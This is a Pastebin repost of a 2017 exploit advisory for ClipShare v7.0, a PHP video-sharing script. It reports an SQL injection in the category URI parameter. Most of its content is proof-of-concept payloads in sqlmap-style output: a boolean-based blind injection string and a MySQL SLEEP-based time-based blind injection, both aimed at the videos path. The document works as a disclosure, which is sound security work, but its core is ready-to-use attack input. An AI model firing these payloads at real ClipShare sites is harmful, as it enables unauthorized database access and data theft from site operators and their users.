Advertisement
AbdulMuttaqin

ClipShare v7.0 - SQL Injection

Oct 16th, 2017
833
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.21 KB | None | 0 0
  1. # Exploit Title: ClipShare v7.0 - SQL Injection
  2. # Date: 2017-10-09
  3. # Exploit Author: 8bitsec
  4. # Vendor Homepage: http://www.clip-share.com/
  5. # Software Link: http://www.clip-share.com/
  6. # Version: 7.0
  7. # Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
  8. # Contact: https://twitter.com/_8bitsec
  9.  
  10. Release Date:
  11. =============
  12. 2017-10-09
  13.  
  14. Product & Service Introduction:
  15. ===============================
  16. ClipShare is the first and most popular PHP video script for building highly-profitable video sharing websites.
  17.  
  18. Technical Details & Description:
  19. ================================
  20.  
  21. SQL injection on [category] URI parameter.
  22.  
  23. Proof of Concept (PoC):
  24. =======================
  25.  
  26. SQLi:
  27.  
  28. https://localhost/[path]/videos/[category]' AND 5593=5593 AND 'LJPS'='LJPS
  29.  
  30. Parameter: #1* (URI)
  31. Type: boolean-based blind
  32. Title: AND boolean-based blind - WHERE or HAVING clause
  33. Payload: https://localhost/[path]/videos/[category]' AND 5593=5593 AND 'LJPS'='LJPS
  34.  
  35. Type: AND/OR time-based blind
  36. Title: MySQL >= 5.0.12 AND time-based blind
  37. Payload: https://localhost/[path]/videos/[category]' AND SLEEP(5) AND 'xNCN'='xNCN
  38.  
  39. ==================
  40. 8bitsec - [https://twitter.com/_8bitsec]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement